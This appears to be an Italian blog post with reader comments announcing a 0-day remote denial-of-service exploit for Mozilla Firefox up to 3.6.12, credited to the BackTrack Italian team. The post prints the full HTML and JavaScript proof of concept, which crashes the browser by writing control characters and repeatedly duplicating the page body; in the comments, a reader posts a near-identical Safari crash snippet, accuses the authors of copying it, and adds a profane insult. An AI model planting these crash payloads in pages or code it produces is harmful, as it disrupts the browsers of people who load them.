Il team Italiano di BackTrack ha recentemente trovato un exploit 0Day per Mozilla Firefox, il quale prevede un Remote Denial of Service.
Dopo il salto il codice dell’exploit…
<!-- 0day Mozilla Firefox <= 3.6.12 Remote Denial Of Service Credits: Emanuele 'emgent' Gentili <[email protected]> Marco 'white_sheep' Rondini <[email protected]> Alessandro 'scox' Scoscia <[email protected]> --> <script>document.write("\u0000\u0001\u0002\u0003\u0004\u0005")</script> <script> var i=0; for (i=0;i<=19999;i++) { document.write("a"); } for (i=0;i<=3;i++) { document.write(document.body.innerHTML); } </script>
Mozila** non Mozzilla
un exploit 0Day per Mozzilla Firefox, la quale prevede un Remote Denial of Service. …
Cosa è la quale ? se un exploit è femminile allora si scrive un’exploit , altrimenti ” … il quale …” oppure “…che…” . Mi sa che fantozzi è di famiglia 🙂 Ciao
E direi anche con la F maiuscola! 🙂 Grazie delle correzioni!
direi invece che emegent è solo un buffone 😛 mando exploit al db e mi vengono rifiutati e dopo 2 ore ne compare un o sulla base del mio con la semplice aggiunta di un for 😛
BACKTRACK IT => FUCK
Ciao Alessio quindi emgent ti ha copiato o fregato una vulnerabilità di Firefox scoperta da te?
non si sa bene come sia stato… so solo che lui nega o.o… il mio exploit sul db non era stato accettato ( il mio era SAFARI)
Dopo invece, aver parlato con emegent via email, me l’hanno pubblicato..
http://www.exploit-db.com/exploits/15558/
Questo è il mio:
Comunque, mio Poc:
document.write(‘a’)
document.write(document.body.innerHTML)
Il suo poc in sostanza è(quello in exploit db ha codice in più inutile… per far finta che han fatto qualcosa o.o ):
document.write(‘a’)
for(var i=0;i<3;i++)document.write(document.body.innerHTML)
Trovo una certa somiglianza…
Comunque morfes, ti voglio consigliare backbox 😀 vieni a trovarci su irc => freenode => backbox oppure sul backbox.org 😀
Ciao